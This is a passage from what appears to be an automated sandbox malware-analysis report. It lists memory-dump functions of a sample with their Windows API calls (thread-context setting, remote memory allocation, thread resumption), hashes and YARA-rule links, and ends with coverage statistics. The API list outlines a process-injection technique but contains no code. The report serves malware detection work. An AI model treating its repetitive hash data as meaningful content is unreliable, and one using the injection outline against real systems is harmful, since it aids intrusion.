                                                                                • Instruction ID: 3e4f5cc88d1f744bf4d2393827648e12db7de559cf116d749476e8e40e82ec35
                                                                                • Opcode Fuzzy Hash: e6a0a61c8a7f714602b3acf4458fbcb933fb6a0384774f28b4ab82a259ef98d6
                                                                                • Instruction Fuzzy Hash: FA2139B1D00259DFDB10CFAAC845AEEFBF5FF48320F548829E519A7240C7799900CBA0
                                                                                Function 0766ADC8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766AE46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 00e6232169e068e91492d76818ff93982fabfecf755b6e10ab76b40d6381d97d
                                                                                • Instruction ID: f72c12a43e1c8626f1e5b74433fda342c5ac31a1e5ea05f613fb231048622dd5
                                                                                • Opcode Fuzzy Hash: 00e6232169e068e91492d76818ff93982fabfecf755b6e10ab76b40d6381d97d
                                                                                • Instruction Fuzzy Hash: B82138B1D002098FDB10DFAAC485BAEBBF4EF88320F548429D519B7340CB789944CFA0
                                                                                Function 02CDD6A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CDD727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 7784e16fd8e15f4c8d4994dce56b61487d0ffa66c84415434691fa837436db0c
                                                                                • Instruction ID: 3d009c8adaa4f9ab8df283b608e6e63eea5135bcd698267504c3668bbb421268
                                                                                • Opcode Fuzzy Hash: 7784e16fd8e15f4c8d4994dce56b61487d0ffa66c84415434691fa837436db0c
                                                                                • Instruction Fuzzy Hash: 8C21E3B5D00248DFDB10CFAAD984ADEBBF8EB48320F14845AE914A7310C375A940CFA1
                                                                                Function 0766B2D7 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0766B346
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 482599b3797904edc451d226dc081b7353187a038324d9faf04aa83e42835fb5
                                                                                • Instruction ID: 33e2a289b0e97499a4089e170df6e8486fc23cd03592b4b53734029a88eb11b2
                                                                                • Opcode Fuzzy Hash: 482599b3797904edc451d226dc081b7353187a038324d9faf04aa83e42835fb5
                                                                                • Instruction Fuzzy Hash: 4C113AB1900249DFDB10DFAAC845ADEBFF5EF48320F148819E519B7650C7759540CFA1
                                                                                Function 0766B2D8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0766B346
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 7807417829963a85d51ed1dc59e99d9c8dc7315e242fc543e1bf1e7a201e3b90
                                                                                • Instruction ID: 6096af3ab5d68aa40d3e9bdc7a11e19c356ac39e5e2f055cf5923cc9f1579dc7
                                                                                • Opcode Fuzzy Hash: 7807417829963a85d51ed1dc59e99d9c8dc7315e242fc543e1bf1e7a201e3b90
                                                                                • Instruction Fuzzy Hash: AC1107B2900249DFDB10DFAAC845ADEBFF5EF88324F248819E519B7250C7759940CFA5
                                                                                Function 0766AD17 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: dbfe6c9f21f4f20fd1e0d635169912f2e3d7b2bd821cdc41205b8c4288061d07
                                                                                • Instruction ID: ce3f40f15f53370b0b46a2175599025237f597777254d6771ce51708edb78677
                                                                                • Opcode Fuzzy Hash: dbfe6c9f21f4f20fd1e0d635169912f2e3d7b2bd821cdc41205b8c4288061d07
                                                                                • Instruction Fuzzy Hash: 1C1128B1D006498FDB20DFAAC4457EEFBF9EF88324F148819D519B7240CB75A940CBA5
                                                                                Function 0766AD18 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: fccf45aa2803030dde8edeb76ec179053ac2142f7c77754a655f006ca59a61a7
                                                                                • Instruction ID: 4070eeb1fd2ad0d75069e9e56399902f6139e806805c1612809e9ea1776310d1
                                                                                • Opcode Fuzzy Hash: fccf45aa2803030dde8edeb76ec179053ac2142f7c77754a655f006ca59a61a7
                                                                                • Instruction Fuzzy Hash: 84113AB1D006498FDB10DFAAC44579EFBF9EF88324F148819D519B7340CB75A940CBA4
                                                                                Function 0766FA90 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766FAF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 2448c64f05097ababdaffc84eaead2decb991c3bf6506da6466bf4e5261020e6
                                                                                • Instruction ID: e7c76dd51ec0f6ed16359c3956b265453784f1fdb645cd6c58d69ebea6cdd8ce
                                                                                • Opcode Fuzzy Hash: 2448c64f05097ababdaffc84eaead2decb991c3bf6506da6466bf4e5261020e6
                                                                                • Instruction Fuzzy Hash: 4011E3B5900289DFDB20CF9AD885BDEBFF8EB48320F14885AD554A7600C379A544CFA1
                                                                                Function 02CDAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 02CDB01E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 0e2351e863d3a71f4902e5e6c221c8b5498d47b980ea127df0f0ae260da3aa45
                                                                                • Instruction ID: 0275df352006f47bec7b952900512a9b8541e5fb1ad85116e0ab1c2733a5bccd
                                                                                • Opcode Fuzzy Hash: 0e2351e863d3a71f4902e5e6c221c8b5498d47b980ea127df0f0ae260da3aa45
                                                                                • Instruction Fuzzy Hash: C6110FB5D006498FCB20CF9AC844B9EFBF4EF88224F15841AD528A7200D379A545CFA1
                                                                                Function 07669B94 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766FAF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: b61810f8e166df45e16e945dbf2c92581c723d9c5a825d0a37177eaf63570ffc
                                                                                • Instruction ID: 8440f442b620aea983e9abb6e87e0c392051a46dd78f12d38b95de47c8cb5633
                                                                                • Opcode Fuzzy Hash: b61810f8e166df45e16e945dbf2c92581c723d9c5a825d0a37177eaf63570ffc
                                                                                • Instruction Fuzzy Hash: 2411F5B5800349DFDB10CF9AD888BDEBBF8EB48320F108459E519A7700C3B5A944CFA1
                                                                                Function 0766B480 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0766B508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 22ce374bdfde753e602df9264e4178fb45b5253489d44a847247a142268897ce
                                                                                • Instruction ID: c7e3a570af8fb65cfe3121d5108546922780f2eb688f3b8e6a48ce0184550061
                                                                                • Opcode Fuzzy Hash: 22ce374bdfde753e602df9264e4178fb45b5253489d44a847247a142268897ce
                                                                                • Instruction Fuzzy Hash: 560181B2800249CEDF10DFA9D8087DDFFF1AF44324F68841AD159A7292C7799455DB21
                                                                                Function 0B0213E8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1872374871.000000000B020000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B020000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b020000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                • Opcode ID: 315b39bbc5b16ca79087bb08d7467e30199a7f322874b771de8a8edf8d5c812b
                                                                                • Instruction ID: 028fd7468241590c6c4eb04c07f99b4ca989b9de34de6c27989b6bbeed26ed4a
                                                                                • Opcode Fuzzy Hash: 315b39bbc5b16ca79087bb08d7467e30199a7f322874b771de8a8edf8d5c812b
                                                                                • Instruction Fuzzy Hash: 7A213835A042149FDB56CFA8D8859ECBBBAFF4A210F284096D408F7351C7399907CB51
                                                                                Function 0B0213F8 Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1872374871.000000000B020000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B020000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b020000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                • Opcode ID: fb5ed06564461e0974e612b63e4d57baecdd096ac6cc23499970d737faa7e5eb
                                                                                • Instruction ID: 45483162d74b45d9107d3c43ad3eac226c4411249610540d466e9a281b5a8b1e
                                                                                • Opcode Fuzzy Hash: fb5ed06564461e0974e612b63e4d57baecdd096ac6cc23499970d737faa7e5eb
                                                                                • Instruction Fuzzy Hash: 86D0A73014A118E7EE48DB65D405BAE77AD9741204F044454D50D331508A700E58D652
                                                                                Function 0125D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73284cecba1aab1ab750ecd38ff4a6952b4ff55226bee88e306eef5c6b8d9f85
                                                                                • Instruction ID: b000a45c3e35a53c3b1fcff20e8b9971b8ca119bb65316a60b6b2ca8c479a9d7
                                                                                • Opcode Fuzzy Hash: 73284cecba1aab1ab750ecd38ff4a6952b4ff55226bee88e306eef5c6b8d9f85
                                                                                • Instruction Fuzzy Hash: AC214971514208DFDB41DF98C5C0B26BBA5FB88324F24C56DED098F243C376D846CA61
                                                                                Function 0125D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e90b736f6df96eacb474a3bf8d26f607ec5bc55277dadcfa0c3783e33252713e
                                                                                • Instruction ID: cff907d96e8d253affc3ca99b0e2f8a2ee6d4e96e26e4afdb7f7e1991e33bf46
                                                                                • Opcode Fuzzy Hash: e90b736f6df96eacb474a3bf8d26f607ec5bc55277dadcfa0c3783e33252713e
                                                                                • Instruction Fuzzy Hash: DA212271614208DFDB55DF68D8C0B26BBA5FB88314F24C96DED0A4B246C37AD407CA61
                                                                                Function 0125D006 Relevance: .1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3e4ffdf7fbf327f1977df5466010dce74015cfb9413ea2def157c2228495118
                                                                                • Instruction ID: 76f907754fa13fa2c89fef90aa8bf98974eb7480686f73562ce6d8d529977e60
                                                                                • Opcode Fuzzy Hash: d3e4ffdf7fbf327f1977df5466010dce74015cfb9413ea2def157c2228495118
                                                                                • Instruction Fuzzy Hash: 8B219D755093848FDB13CF64D9D0B15BF71EB46314F28C5EAD9498B2A7C33A980ACB62
                                                                                Function 0125D1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction ID: 2da597a1b10f1e79c296570e8202caeb474f61ad055537069765ad241f59c8d4
                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction Fuzzy Hash: 3411BB75504284DFDB12CF54C5C0B15BBA1FB84224F24C6ADDD498B297C33AD44ACB61
                                                                                Function 0104D759 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862134583.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_104d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f504fd931e9eb1103f6c8709d3fa7de6dc632de3ce30e327459c81157dcfad8b
                                                                                • Instruction ID: 426ca258ebe2e0b84eeea4841f81edbf9719d0b642ac1a93982164afe59458ac
                                                                                • Opcode Fuzzy Hash: f504fd931e9eb1103f6c8709d3fa7de6dc632de3ce30e327459c81157dcfad8b
                                                                                • Instruction Fuzzy Hash: D601FCB11043809BE750DB9ACCC4B66FFE8FF51724F188866ED490E246D3789840C771
                                                                                Function 0104D758 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862134583.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_104d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0c7665c4af7038066d15dd12d382697d8c98c5c287749ed2829edb68dd5d249c
                                                                                • Instruction ID: b70c0034b46dea66d59b742de34b8eeff31e0e1553f71921e71dc048f65b2f93
                                                                                • Opcode Fuzzy Hash: 0c7665c4af7038066d15dd12d382697d8c98c5c287749ed2829edb68dd5d249c
                                                                                • Instruction Fuzzy Hash: 26F0AF72004280AAE7218A0AC8C4B62FFE8EB51624F18C45AED484B286C279A844CBB1

                                                                                Non-executed Functions

                                                                                Function 0766A290 Relevance: .5, Instructions: 497COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9cc92f272f14339a37d2d55139c6e3d440116ef6db663c999d6322f6a32d5212
                                                                                • Instruction ID: dff017bf0286f54c1a0a95c7c916757006e1b86f81546e1340078258bf19a1ba
                                                                                • Opcode Fuzzy Hash: 9cc92f272f14339a37d2d55139c6e3d440116ef6db663c999d6322f6a32d5212
                                                                                • Instruction Fuzzy Hash: E1222AB4E002558FCB14CFA9C5889ADBBF2AF88304F64C159D415BB356D731AC86CFA0
                                                                                Function 07668480 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e33927960b84b72ebce9f76448ca293069a64a92d2483c9d45bd62b3ffc23e8b
                                                                                • Instruction ID: 8460f7087c687298138c457d0385fb7dbfc6b70bb2692827a0752769801ee124
                                                                                • Opcode Fuzzy Hash: e33927960b84b72ebce9f76448ca293069a64a92d2483c9d45bd62b3ffc23e8b
                                                                                • Instruction Fuzzy Hash: B0E1ECB4E0425A8FCB14DFA9C5849AEFBF2FF89304F248169D415AB355D730A942CFA1
                                                                                Function 0766AEA0 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20b8a3821be9374793cb00de70dfadd75a162af93ca882241e8be7e59750a51e
                                                                                • Instruction ID: 360582b5b3c78e2750bdd79cd2945bdf1bc756b68a8c0f5c13e492a4a8e5b0db
                                                                                • Opcode Fuzzy Hash: 20b8a3821be9374793cb00de70dfadd75a162af93ca882241e8be7e59750a51e
                                                                                • Instruction Fuzzy Hash: 23E1E6B4E00259CFCB14DFA9C5849AEFBB2BF89304F248169D419AB355D731A942CFA1
                                                                                Function 07668CF0 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d0cceef785023b51d1714dc13d90c38ce1251dc50c1219f1bbe83415b64d598
                                                                                • Instruction ID: 98971813d4c665820019d3432835fd0b70e5710a579d3eb2f5fdc42988af68b8
                                                                                • Opcode Fuzzy Hash: 7d0cceef785023b51d1714dc13d90c38ce1251dc50c1219f1bbe83415b64d598
                                                                                • Instruction Fuzzy Hash: 3EE10BB4E042598FCB14DFA9C5849AEFBB2FF89304F248169D815AB355D731A942CFA0
                                                                                Function 076688B8 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21bd9c76e90a9e509ed5b6b471f277fa9853c6a06cb6ac4078a814b57be7915e
                                                                                • Instruction ID: 845f1d5087e39e452e8627cd16c724eb4bb7b1af4e4c74cc3f36a7a56209496e
                                                                                • Opcode Fuzzy Hash: 21bd9c76e90a9e509ed5b6b471f277fa9853c6a06cb6ac4078a814b57be7915e
                                                                                • Instruction Fuzzy Hash: F4E10CB4E0425A8FCB14DFA9C5849AEFBB2FF89304F248169D415AB355D730AD42CFA1
                                                                                Function 07660840 Relevance: .3, Instructions: 273COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c070d0fd5f308df211427647f3d91387e051e921d47e5da54de81f4302c36e8c
                                                                                • Instruction ID: 2351737aad7633f81921600dc90af0e40b96770f7e8cd7d72f7c885a1a0d4964
                                                                                • Opcode Fuzzy Hash: c070d0fd5f308df211427647f3d91387e051e921d47e5da54de81f4302c36e8c
                                                                                • Instruction Fuzzy Hash: CBD1273192075B8ACB15EB64D990ADDB7B1FFA5300F60D79AE0493B210FB706AC5CB91
                                                                                Function 02CDD384 Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e923fbe60ecc3227605de182bad3d958413577d90d01ac7ece10bebfe9ca354
                                                                                • Instruction ID: 7db0f94942d4b33a1735278ee5b323fad7f729344095b96c4c7818e6d6087eeb
                                                                                • Opcode Fuzzy Hash: 3e923fbe60ecc3227605de182bad3d958413577d90d01ac7ece10bebfe9ca354
                                                                                • Instruction Fuzzy Hash: 8CA15E36E002058FCF05DFB5C84459EB7B2FF85304B15856EEA06AB665DB71EA16CB80
                                                                                Function 07660850 Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37e963b69bd421acf6d17d5dab230cc895cf6daf44249ddd19e7776b280ab650
                                                                                • Instruction ID: 5accfd394c791760b433f1eadea445d69f95b3a9994542eec9bccbe7a1617a95
                                                                                • Opcode Fuzzy Hash: 37e963b69bd421acf6d17d5dab230cc895cf6daf44249ddd19e7776b280ab650
                                                                                • Instruction Fuzzy Hash: 81D1F83192075B8ACB15EB64D990ADDB7B1FFA5300F60D79AE0493B210FB706AC5CB91
                                                                                Function 07668CE1 Relevance: .1, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9b7f453b0964629658a3aba82c6aab25068a88fa0a6852aaa05e66b2348f57b
                                                                                • Instruction ID: 3fa6066344cd6f149a34d0d102f89fc574b2678726dae5f721f1e62096278004
                                                                                • Opcode Fuzzy Hash: d9b7f453b0964629658a3aba82c6aab25068a88fa0a6852aaa05e66b2348f57b
                                                                                • Instruction Fuzzy Hash: 25514EB4E0425A8FCB14DFA9C5845AEFBF2BF89300F24C16AD419A7316C7355942CFA1
                                                                                Function 076688A8 Relevance: .1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cb25285460b2078bb8ab74c61c9683b0d487fbd3f6bbb7b2aab14df69a07d3a
                                                                                • Instruction ID: bccb5a4dac6ba15588d45cbc705ba57978ac1e270cc6afff51cd71cfb86ee243
                                                                                • Opcode Fuzzy Hash: 0cb25285460b2078bb8ab74c61c9683b0d487fbd3f6bbb7b2aab14df69a07d3a
                                                                                • Instruction Fuzzy Hash: CB512EB5E042598FCB14CFA9C5845AEFBF2BF89304F24C16AD419A7315D730A946CFA1

                                                                                Execution Graph

                                                                                Execution Coverage:14.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:36
                                                                                Total number of Limit Nodes:2
